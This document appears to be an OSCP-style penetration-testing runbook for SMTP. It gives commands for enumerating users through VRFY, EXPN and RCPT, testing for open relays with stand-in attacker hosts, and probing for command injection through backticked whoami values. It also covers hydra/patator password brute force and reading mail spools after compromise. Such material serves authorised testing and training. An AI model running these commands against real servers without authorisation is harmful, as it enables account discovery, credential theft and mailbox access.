Simple Mail Transfer Protocol

Environment Variables / Setup

export IP=
export PORT=25
export SECURE_PORT=587

Phase 1: Service Enumeration

Nmap SMTP Scripts

nmap --script=smtp-* -p$PORT,$SECURE_PORT $IP

telnet $IP $PORT
nc -nv $IP $PORT

Phase 2: SMTP Commands & Enumeration

Basic SMTP Interaction

telnet $IP $PORT
HELO attacker.com
HELP
QUIT

User Enumeration

VRFY Command

# Test VRFY command for user enumeration
echo "VRFY root" | nc -nv $IP $PORT
echo "VRFY admin" | nc -nv $IP $PORT
echo "VRFY user" | nc -nv $IP $PORT

EXPN Command

# Test EXPN command for mailing list expansion
echo "EXPN root" | nc -nv $IP $PORT
echo "EXPN admin" | nc -nv $IP $PORT

RCPT TO Command

# Test RCPT TO for user enumeration
telnet $IP $PORT
HELO attacker.com
MAIL FROM: test@attacker.com
RCPT TO: root@target.com
RCPT TO: admin@target.com
QUIT

Phase 3: Automated User Enumeration

SMTP User Enum Script

#!/bin/bash
# Save as smtp-user-enum.sh
for user in $(cat /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt); do
    echo "VRFY $user" | nc -w 3 $IP $PORT 2>/dev/null | grep -v "Connection"
done

Metasploit User Enumeration

use auxiliary/scanner/smtp/smtp_enum
set RHOSTS $IP
set USER_FILE /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt
run

smtp-user-enum Tool

smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t $IP
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t $IP
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t $IP

Phase 4: SMTP Vulnerabilities

Open Relay Testing

telnet $IP $PORT
HELO attacker.com
MAIL FROM: attacker@evil.com
RCPT TO: victim@target.com
DATA
Subject: Test Email
This is a test email to check for open relay.
.
QUIT

Command Injection Testing

# Test for command injection in SMTP commands
telnet $IP $PORT
HELO `whoami`
MAIL FROM: test@`whoami`.com

Authentication Testing

# Test for SMTP AUTH
telnet $IP $PORT
EHLO attacker.com
AUTH LOGIN
# Base64 encode username and password
echo -n "username" | base64
echo -n "password" | base64

Phase 5: SMTP Security Features

Check Security Extensions

telnet $IP $PORT
EHLO attacker.com
# Look for:
# STARTTLS - TLS encryption
# AUTH - Authentication methods
# SIZE - Message size limits

STARTTLS Testing

# Test TLS encryption
openssl s_client -starttls smtp -connect $IP:$PORT
openssl s_client -connect $IP:465  # SMTPS

Phase 6: Mail Server Software Detection

Version Fingerprinting

# Check SMTP banner for version info
telnet $IP $PORT | head -1

# Common SMTP servers:
# Postfix
# Sendmail  
# Microsoft Exchange
# qmail
# Exim

Software-Specific Vulnerabilities

Look up discovered software versions for known CVEs:

Postfix: Check for command injection vulnerabilities
Sendmail: Check for buffer overflow vulnerabilities
Exchange: Check for authentication bypass vulnerabilities

Phase 7: SMTP Brute Force

Authentication Brute Force

# With hydra (if AUTH is enabled)
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s $PORT smtp://$IP

# With patator
patator smtp_login host=$IP user=admin password=FILE0 0=/usr/share/wordlists/rockyou.txt

Note: Be careful with brute force - may trigger account lockouts

Phase 8: Mail File Access

Check for Mail Files

If you gain system access, check for mail files:

# Common mail directories
/var/mail/
/var/spool/mail/
/home/*/mail/
/home/*/Maildir/

# Mail logs
/var/log/mail.log
/var/log/maillog

Reading Mail Files

# Read mail files for sensitive information
cat /var/mail/user
cat /var/spool/mail/user
find /home -name "*.eml" -o -name "*.msg" 2>/dev/null

Common SMTP Response Codes

220 - Service ready
221 - Service closing transmission channel
250 - Requested mail action okay, completed
354 - Start mail input
421 - Service not available
450 - Requested mail action not taken: mailbox unavailable
451 - Requested action aborted: local error in processing
452 - Requested action not taken: insufficient system storage
500 - Syntax error, command unrecognized
501 - Syntax error in parameters or arguments
502 - Command not implemented
503 - Bad sequence of commands
504 - Command parameter not implemented
550 - Requested action not taken: mailbox unavailable
551 - User not local; please try forward-path
552 - Requested mail action aborted: exceeded storage allocation
553 - Requested action not taken: mailbox name not allowed
554 - Transaction failed

SMTP Enumeration Checklist

Banner grabbing and version identification
VRFY command user enumeration
EXPN command mailing list enumeration
RCPT TO user enumeration
Open relay testing
SMTP AUTH brute force (if enabled)
STARTTLS security testing
Command injection testing
Mail file access (if system compromised)

Tools Summary

# Manual enumeration
telnet, nc, openssl

# Automated enumeration  
smtp-user-enum, nmap scripts

# Brute force
hydra, patator, metasploit

# User enumeration wordlists
/usr/share/wordlists/seclists/Usernames/

Next Steps

Once SMTP enumeration is complete:

Document discovered users for password attacks
Test discovered credentials on other services
Check for mail relay abuse opportunities
Analyze mail files if system access gained

Veilcat

Explorer

Latest

OSCP 🐲

Medjed

OSCP Note Template and Runbooks

25,587 SMTP